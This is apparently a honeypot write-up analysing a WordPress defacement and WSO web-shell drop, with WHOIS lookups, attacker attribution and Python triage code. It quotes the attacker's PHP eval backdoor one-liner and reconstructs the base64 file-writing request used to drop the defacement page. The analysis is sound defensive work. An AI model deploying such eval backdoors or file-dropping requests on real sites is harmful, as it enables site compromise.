A defacement that preceded a WSO download from the same IP address by about an hour.
Defacement | 2019-08-31T05:02:25.356-06:00 | /wp-content/themes/twentytwelve/404.php |
WSO download | 2019-08-31T05:55:41.59-06:00 | /wp-content/themes/twentytwelve/404.php |
Apparently, the attacker(s) thought they were sending Base64-encoded PHP source code to an immediate-eval backdoor. This backdoor clearly evaluated code in an HTTP parameter named "520". The WSO shell download went to an immediate-eval backdoor that used an HTTP parameter named "dd" for the same purpose. The attackers used the same URL for both downloads, which does not reconcile with two different names for the HTTP parameter containing the PHP code to eval.
This is the same IP address from which a WSO web shell was downloaded to my WordPress honey pot.
113.244.245.160 has no DNS name. It belongs to Chinanet:
inetnum: 113.240.0.0 - 113.247.255.255
netname: CHINANET-HN
descr: CHINANET HUNAN PROVINCE NETWORK
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
The PHP code sent to the backdoor is just a one-liner:
@eval(base64_decode($_POST[z0]));
The HTTP parameter named "z0" contained Base64-encoded PHP that:
- Base64-decodes a file name "SCRIPT_FILENAMEZ:://o.htm" from HTTP parameter named "z1"
- Base64-decodes an HTML file
- Tries to write the HTML file to the file name "SCRIPT_FILENAMEZ:://o.htm"
This is quite similar to the follow-up web shell installation.
I'm still confused by the "SCRIPT_FILENAMEZ:://o.htm".
The PHP uses fwrite() to try to write the HTML to "SCRIPT_FILENAMEZ:://o.htm". On a compromised Linux machine, unless a directory named "SCRIPT_FILENAMEZ::" already exists, the fwrite() of the HTML will fail.
On a compromised Windows machine, I think that file name is not allowed due to containing ":" and "/" characters, which I believe are disallowed in Windows file names.
There is no obfuscation involved.
Once dropped and subsequently remotely invoked, the file o.htm advertises a "Chinafans" hacking group.
The HTML apparently wants a YouTube video, https://www.youtube.com/embed/bM7SZ5SBzyY?autoplay=1, to play when the "o.htm" file is referenced. That video no longer exists.
o.htm also wants to run a JavaScript file, /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js, but the URL doesn't reference a host name, so email-decode.min.js has to exist locally, or nothing happens.
The image referenced by the HTML is http://pic.sc.chinaz.com/files/pic/pic9/201606/fpic5084.jpg
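As an added example (my own triage code, not anything from the attacker's toolkit or the honeypot), a small Python routine that walks the same decoding steps described above for the z0/z1 request and the dropped o.htm: it unpacks the eval'd PHP from a POST body, traces the fopen() handle back to the parameter holding the target path, computes the directory that a Linux fwrite() would need to exist, and lists the src/href URLs in the embedded HTML, separating those with a host from host-less ones like email-decode.min.js. The POST body, the PHP shape and the HTML are constructed to resemble the capture; they are not the original bytes.

```python
import base64
import re
from posixpath import dirname
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed sample resembling the honeypot capture: z0 carries base64 PHP that
# decodes a target path from z1 and fwrite()s an inline base64 HTML blob to it.
HTML = (b'<html><body>'
        b'<iframe src="https://www.youtube.com/embed/bM7SZ5SBzyY?autoplay=1"></iframe>'
        b'<script src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>'
        b'<img src="http://pic.sc.chinaz.com/files/pic/pic9/201606/fpic5084.jpg">'
        b'</body></html>')
PHP = (b'$f=base64_decode($_POST["z1"]);'
       b'$d=base64_decode("' + base64.b64encode(HTML) + b'");'
       b'$h=@fopen($f,"w");@fwrite($h,$d);@fclose($h);echo "ok";')
SAMPLE_BODY = urlencode({"z0": base64.b64encode(PHP).decode(),
                         "z1": base64.b64encode(b"SCRIPT_FILENAMEZ:://o.htm").decode()})


def decode_chopper_post(body: str) -> dict:
    """Statically unpack a z0/z1-style POST: whether it writes a file, where, and what the HTML loads."""
    params = {k: v[0] for k, v in parse_qs(body).items()}
    php = base64.b64decode(params["z0"]).decode("latin-1")
    report = {"writes_file": "fwrite(" in php, "target": None, "parent_dir": None}
    # Find the variable passed to fopen(..., "w") and trace it to the $_POST parameter it came from.
    opened = re.search(r'fopen\(\$(\w+),\s*"w"\)', php)
    if opened:
        src = re.search(r'\$' + opened.group(1) + r'=base64_decode\(\$_POST\["?(\w+)"?\]\)', php)
        if src and src.group(1) in params:
            report["target"] = base64.b64decode(params[src.group(1)]).decode("latin-1")
            # On Linux the fwrite() only succeeds if this directory already exists.
            report["parent_dir"] = dirname(report["target"])
    # Inline base64 literals are the content being dropped; pull every src/href out of them.
    blobs = [base64.b64decode(b).decode("latin-1")
             for b in re.findall(r'base64_decode\("([A-Za-z0-9+/=]+)"\)', php)]
    urls = sorted(set(re.findall(r'(?:src|href)="([^"]+)"', "".join(blobs))))
    report["urls"] = urls
    # Host-less URLs (like the email-decode.min.js one) can only resolve on the victim itself.
    report["external_hosts"] = sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname})
    return report


if __name__ == "__main__":
    for key, value in decode_chopper_post(SAMPLE_BODY).items():
        print(f"{key}: {value}")
```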
pic.sc.chinaz.com has a canonical name of "pic.sc.chinaz.com.w.kunlungr.com", and an IP address of 116.207.118.74.
The chinaz.com domain name is registered via ename.com, and no client info is provided.
116.207.118.74 is a CHINANET Hubei province network address:
inetnum: 116.207.0.0 - 116.207.255.255
netname: CHINANET-HB
descr: CHINANET Hubei province network
descr: Data Communication Division
descr: China Telecom
country: CN
"kunlungr.com" is an Alibaba registered domain. Of course, client info is missing.
The Twitter handle 0xfans is mostly in Chinese characters, and claims a given name of "0x1996". It has a few tweets indicating they're a hacking crew.
big shell Team
A large Hacking Team in China
Looking for a foreign friend hacker
Form a strong attack team
http://zone-h.org/archive/notifier=chinafans
There's also a little image posted:
There's a "Very six" hotel somewhere in South Korea, and the web is full of "very six" phrases that seem to mostly be misspellings of "very sexy".
The 0xfans Twitter handle references their Zone-H defacement archive:
The "SCRIPT_FILENAMEZ:://o.htm" filename must work under some circumstances. They list Windows, Linux and FreeBSD machines as defaced. The "o.htm" filename seems consistent.